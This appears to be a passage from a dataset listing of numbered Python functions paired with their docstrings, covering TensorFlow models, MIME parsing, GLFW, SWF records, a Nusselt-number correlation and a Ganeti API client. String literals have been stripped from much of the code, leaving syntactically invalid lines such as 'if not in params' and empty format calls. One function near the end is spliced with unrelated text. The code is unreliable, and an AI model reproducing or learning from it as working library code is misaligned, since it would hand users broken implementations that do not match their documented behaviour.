model = tfp.sts.Sum(components=[day_of_week, local_linear_trend],
observed_time_series=observed_time_series)
num_steps_forecast = 50
samples, kernel_results = tfp.sts.fit_with_hmc(model, observed_time_series)
```
To extract the contributions of individual components, pass the time series
and sampled parameters into `decompose_by_component`:
```python
component_dists = decompose_by_component(
model,
observed_time_series=observed_time_series,
parameter_samples=samples)
# Component mean and stddev have shape `[len(observed_time_series)]`.
day_of_week_effect_mean = component_dists[day_of_week].mean()
day_of_week_effect_stddev = component_dists[day_of_week].stddev()
```
Using the component distributions, we can visualize the uncertainty for
each component:
```
from matplotlib import pylab as plt
num_components = len(component_dists)
xs = np.arange(len(observed_time_series))
fig = plt.figure(figsize=(12, 3 * num_components))
for i, (component, component_dist) in enumerate(component_dists.items()):
# If in graph mode, replace `.numpy()` with `.eval()` or `sess.run()`.
component_mean = component_dist.mean().numpy()
component_stddev = component_dist.stddev().numpy()
ax = fig.add_subplot(num_components, 1, 1 + i)
ax.plot(xs, component_mean, lw=2)
ax.fill_between(xs,
component_mean - 2 * component_stddev,
component_mean + 2 * component_stddev,
alpha=0.5)
ax.set_title(component.name)
``` |
11,179 | def img2img_transformer2d_n31():
hparams = img2img_transformer2d_base()
hparams.batch_size = 1
hparams.num_encoder_layers = 6
hparams.num_decoder_layers = 12
hparams.num_heads = 8
hparams.query_shape = (16, 32)
hparams.memory_flange = (16, 32)
return hparams | Set of hyperparameters. |
11,180 | def parse_media_range(range):
(type, subtype, params) = parse_mime_type(range)
if not in params or not params[] or \
float(params[]) > 1 or float(params[]) < 0:
params[] =
return (type, subtype, params) | Carves up a media range and returns a tuple of the
(type, subtype, params) where 'params' is a dictionary
of all the parameters for the media range.
For example, the media range 'application/*;q=0.5' would
get parsed into:
('application', '*', {'q', '0.5'})
In addition this function also guarantees that there
is a value for 'q' in the params dictionary, filling it
in with a proper default if necessary. |
11,181 | def add_node(self, info):
if not info.initialized:
return
graph = self._request_graph(info.ui.control)
if graph is None:
return
IDs = [v.ID for v in graph.nodes]
node = Node(ID=make_unique_name("node", IDs))
graph.nodes.append(node)
retval = node.edit_traits(parent=info.ui.control, kind="livemodal")
if not retval.result:
graph.nodes.remove(node) | Handles adding a Node to the graph. |
11,182 | def check(self, completed, failed=None):
if len(self) == 0:
return True
against = set()
if self.success:
against = completed
if failed is not None and self.failure:
against = against.union(failed)
if self.all:
return self.issubset(against)
else:
return not self.isdisjoint(against) | check whether our dependencies have been met. |
11,183 | def init():
cwd = _getcwd()
res = _glfw.glfwInit()
os.chdir(cwd)
return res | Initializes the GLFW library.
Wrapper for:
int glfwInit(void); |
11,184 | def _get_struct_dropshadowfilter(self):
obj = _make_object("DropShadowFilter")
obj.DropShadowColor = self._get_struct_rgba()
obj.BlurX = unpack_fixed16(self._src)
obj.BlurY = unpack_fixed16(self._src)
obj.Angle = unpack_fixed16(self._src)
obj.Distance = unpack_fixed16(self._src)
obj.Strength = unpack_fixed8(self._src)
bc = BitConsumer(self._src)
obj.InnerShadow = bc.u_get(1)
obj.Knockout = bc.u_get(1)
obj.CompositeSource = bc.u_get(1)
obj.Passes = bc.u_get(5)
return obj | Get the values for the DROPSHADOWFILTER record. |
11,185 | def setattr(self, name, val):
nodes = self._do_query(multiple=False)
try:
return self.poco.agent.hierarchy.setAttr(nodes, name, val)
except UnableToSetAttributeException as e:
raise InvalidOperationException(.format(str(e), self)) | Change the attribute value of the UI element. Not all attributes can be casted to text. If changing the
immutable attributes or attributes which do not exist, the InvalidOperationException exception is raised.
Args:
name: attribute name
val: new attribute value to cast
Raises:
InvalidOperationException: when it fails to set the attribute on UI element |
11,186 | def _set_lldp(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=lldp.lldp, is_container=, presence=True, yang_name="lldp", rest_name="lldp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u: {u: u, u: u, u: u, u: None, u: None, u: None, u: u}}, namespace=, defining_module=, yang_type=, is_config=True)
except (TypeError, ValueError):
raise ValueError({
: ,
: "container",
: ,
})
self.__lldp = t
if hasattr(self, ):
self._set() | Setter method for lldp, mapped from YANG variable /protocol/lldp (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_lldp is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_lldp() directly. |
11,187 | def list_overlay_names(self):
overlay_names = []
for fname in _ls(self._overlays_abspath):
name, ext = os.path.splitext(fname)
overlay_names.append(name)
return overlay_names | Return list of overlay names. |
11,188 | def read_client_secrets():
client_secrets = _default_client_secrets()
secrets = get_secrets_file()
if secrets is not None:
client_secrets = read_json(secrets)
else:
from sregistry.defaults import SREGISTRY_CLIENT_SECRETS
write_json(client_secrets, SREGISTRY_CLIENT_SECRETS)
return client_secrets | for private or protected registries, a client secrets file is required
to be located at .sregistry. If no secrets are found, we use default
of Singularity Hub, and return a dummy secrets. |
11,189 | def infos(self, type=None, failed=False):
nodes = self.nodes(failed="all")
infos = []
for n in nodes:
infos.extend(n.infos(type=type, failed=failed))
return infos | Get all infos created by the participants nodes.
Return a list of infos produced by nodes associated with the
participant. If specified, ``type`` filters by class. By default, failed
infos are excluded, to include only failed nodes use ``failed=True``,
for all nodes use ``failed=all``. Note that failed filters the infos,
not the nodes - infos from all nodes (whether failed or not) can be
returned. |
11,190 | def build_message(self, checker):
solution = % checker.solution if self.with_solutions else
return .format(checker.code,
checker.msg,
solution) | Builds the checker's error message to report |
11,191 | def filter_composite_from_subgroups(s):
dims = []
for letter, sg in zip(, s[2:]):
dims.append(.format(letter))
if dims:
return .join(dims) | Given a sorted list of subgroups, return a string appropriate to provide as
the a composite track's `filterComposite` argument
>>> import trackhub
>>> trackhub.helpers.filter_composite_from_subgroups(['cell', 'ab', 'lab', 'knockdown'])
'dimA dimB'
Parameters
----------
s : list
A list representing the ordered subgroups, ideally the same list
provided to `dimensions_from_subgroups`. The values are not actually
used, just the number of items. |
11,192 | def status_counter(self):
counter = collections.Counter()
for task in self:
counter[str(task.status)] += 1
return counter | Returns a `Counter` object that counts the number of task with
given status (use the string representation of the status as key). |
11,193 | def get_reference_line_numeration_marker_patterns(prefix=u):
title = u""
if type(prefix) in (str, unicode):
title = prefix
g_name = u
g_close = u
space = r
patterns = [
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
space + title + g_name + r + g_close,
]
return [re.compile(p, re.I | re.UNICODE) for p in patterns] | Return a list of compiled regex patterns used to search for the marker.
Marker of a reference line in a full-text document.
:param prefix: (string) the possible prefix to a reference line
:return: (list) of compiled regex patterns. |
11,194 | def gather_dilated_memory_blocks(x,
num_memory_blocks,
gap_size,
query_block_size,
memory_block_size,
gather_indices,
direction="left"):
gathered_blocks = []
for block_id in range(num_memory_blocks):
block_end_index = -(query_block_size + gap_size *
(block_id + 1) + memory_block_size * block_id)
block_start_index = (
(memory_block_size + gap_size) * (num_memory_blocks - (block_id + 1)))
if direction != "left":
[block_end_index,
block_start_index] = [-block_start_index, -block_end_index]
if block_end_index == 0:
x_block = x[block_start_index:]
else:
x_block = x[block_start_index:block_end_index]
def gather_dilated_1d_blocks(x, gather_indices):
x_new = tf.gather(x, gather_indices)
return tf.transpose(x_new, [2, 3, 0, 1, 4])
gathered_blocks.append(gather_dilated_1d_blocks(x_block, gather_indices))
return tf.concat(gathered_blocks, 3) | Gathers blocks with gaps in between.
Args:
x: Tensor of shape [length, batch, heads, depth]
num_memory_blocks: how many memory blocks to look in "direction". Each will
be separated by gap_size.
gap_size: an integer indicating the gap size
query_block_size: an integer indicating size of query block
memory_block_size: an integer indicating the size of a memory block.
gather_indices: The indices to gather from.
direction: left or right
Returns:
Tensor of shape [batch, heads, blocks, block_length, depth] |
11,195 | def Nu_cylinder_Zukauskas(Re, Pr, Prw=None):
r
if Re <= 40:
c, m = 0.75, 0.4
elif Re < 1E3:
c, m = 0.51, 0.5
elif Re < 2E5:
c, m = 0.26, 0.6
else:
c, m = 0.076, 0.7
if Pr <= 10:
n = 0.37
else:
n = 0.36
Nu = c*Re**m*Pr**n
if Prw:
Nu = Nu*(Pr/Prw)**0.25
return Nu | r'''Calculates Nusselt number for crossflow across a single tube at a
specified Re. Method from [1]_, also shown without modification in [2]_.
.. math::
Nu_{D}=CRe^{m}Pr^{n}\left(\frac{Pr}{Pr_s}\right)^{1/4}
Parameters
----------
Re : float
Reynolds number with respect to cylinder diameter, [-]
Pr : float
Prandtl number at free stream temperature [-]
Prw : float, optional
Prandtl number at wall temperature, [-]
Returns
-------
Nu : float
Nusselt number with respect to cylinder diameter, [-]
Notes
-----
If Prandtl number at wall are not provided, the Prandtl number correction
is not used and left to an outside function.
n is 0.37 if Pr <= 10; otherwise n is 0.36.
C and m are from the following table. If Re is outside of the ranges shown,
the nearest range is used blindly.
+---------+-------+-----+
| Re | C | m |
+=========+=======+=====+
| 1-40 | 0.75 | 0.4 |
+---------+-------+-----+
| 40-1E3 | 0.51 | 0.5 |
+---------+-------+-----+
| 1E3-2E5 | 0.26 | 0.6 |
+---------+-------+-----+
| 2E5-1E6 | 0.076 | 0.7 |
+---------+-------+-----+
Examples
--------
Example 7.3 in [2]_, matches.
>>> Nu_cylinder_Zukauskas(7992, 0.707, 0.69)
50.523612661934386
References
----------
.. [1] Zukauskas, A. Heat transfer from tubes in crossflow. In T.F. Irvine,
Jr. and J. P. Hartnett, editors, Advances in Heat Transfer, volume 8,
pages 93-160. Academic Press, Inc., New York, 1972.
.. [2] Bergman, Theodore L., Adrienne S. Lavine, Frank P. Incropera, and
David P. DeWitt. Introduction to Heat Transfer. 6E. Hoboken, NJ:
Wiley, 2011. |
11,196 | def sources(self):
try:
return self._sources
except AttributeError:
self._sources = find_sources(self)
return self._sources | Returns a dictionary of source methods found on this object,
keyed on method name. Source methods are identified by
(self, context) arguments on this object. For example:
.. code-block:: python
def f(self, context):
...
is a source method, but
.. code-block:: python
def f(self, ctx):
...
is not. |
11,197 | def variations(iterable, optional=lambda x: False):
iterable = tuple(iterable)
o = [optional(x) for x in iterable]
a = set()
for p in product([False, True], repeat=sum(o)):
p = list(p)
v = [b and (b and p.pop(0)) for b in o]
v = tuple(iterable[i] for i in xrange(len(v)) if not v[i])
a.add(v)
return sorted(a, cmp=lambda x, y: len(y) - len(x)) | Returns all possible variations of a sequence with optional items. |
11,198 | def update_Broyden_J(self):
CLOG.debug()
delta_vals = self.param_vals - self._last_vals
delta_residuals = self.calc_residuals() - self._last_residuals
nrm = np.sqrt(np.dot(delta_vals, delta_vals))
direction = delta_vals / nrm
vals = delta_residuals / nrm
self._rank_1_J_update(direction, vals)
self.JTJ = np.dot(self.J, self.J.T) | Execute a Broyden update of J |
11,199 | def start(self):
version = self.request("get", "/version")
if version != 2:
raise GanetiApiError("Cans calm down, this is totally reasonable. Certain
features = []
else:
raise
logging.info("RAPI features: %r" % (features,))
self.features = features | Confirm that we may access the target cluster. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.